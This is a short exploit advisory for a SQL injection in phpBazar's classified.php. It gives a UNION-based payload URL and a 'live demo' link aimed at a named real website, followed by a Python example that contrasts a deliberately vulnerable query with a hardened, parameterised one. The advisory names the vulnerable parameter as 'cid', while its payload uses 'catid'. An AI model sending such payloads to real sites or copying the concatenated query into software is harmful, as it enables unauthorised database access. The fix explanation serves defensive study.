phpBazar versions 2.1.1fix and below suffer from a remote SQL injection vulnerability.
/*
Author : MizoZ [from MA]
Group : EvilWay, evilway[at]mail[dot]com
Email : mizozx[at]gmail[dot]com
Greetz : Zuka, Dyle !!
MABROOK L3IIIIIIIIIID
*/
The vulnerability is in $_GET['cid']. Exploit:
[HOST]/[PATH]/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--
Live demo:
http://toutsurlegoldenretriever.fr/phpBazar-2.1.1fix/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--
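Why the request above returns attacker-chosen rows, and the fix, as an added example that is not phpBazar's code: it runs the advisory's query string against a flawed and a hardened lookup. Assumptions: the `ads` table, its column names and both function names are constructed, SQLite stands in for the application's database, and the parameter is assumed to be concatenated into a 7-column SELECT (the page does not show the query; seven matches the payload's `select 1,2,3,4,5,6,7`).

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed 7-column schema; the width matches the payload's "select 1,...,7".
COLS = "id, catid, title, body, price, owner, created"
# Query string taken from the advisory's exploit URL.
PAYLOAD = "catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--"


def make_db():
    """In-memory database with two constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE ads ({COLS})")
    db.executemany("INSERT INTO ads VALUES (?,?,?,?,?,?,?)", [
        (10, 2, "bike", "red bike", 50, "ann", "2010-01-01"),
        (11, 3, "desk", "oak desk", 80, "bob", "2010-01-02"),
    ])
    return db


def list_ads_vulnerable(db, query_string):
    """Flawed pattern: the raw parameter becomes part of the SQL text."""
    catid = parse_qs(query_string)["catid"][0]  # '+' decodes to a space
    # "and 1=0" empties the real result set, UNION ALL appends the injected
    # row, and the trailing "--" comments out the ORDER BY clause.
    sql = f"SELECT {COLS} FROM ads WHERE catid = {catid} ORDER BY id"
    return db.execute(sql).fetchall()


def list_ads_hardened(db, query_string):
    """Accept only a short decimal integer and bind it as a parameter."""
    catid = parse_qs(query_string).get("catid", [""])[0]
    if not re.fullmatch(r"[0-9]{1,9}", catid):
        raise ValueError("catid must be a decimal integer")
    sql = f"SELECT {COLS} FROM ads WHERE catid = ? ORDER BY id"
    return db.execute(sql, (int(catid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(list_ads_vulnerable(db, "catid=2"))  # the one legitimate row
    print(list_ads_vulnerable(db, PAYLOAD))    # only the injected row
    try:
        list_ads_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

Either control alone stops this payload; the integer check also gives a clean rejection to log, while the bound parameter keeps the value out of the SQL text even if validation is later loosened.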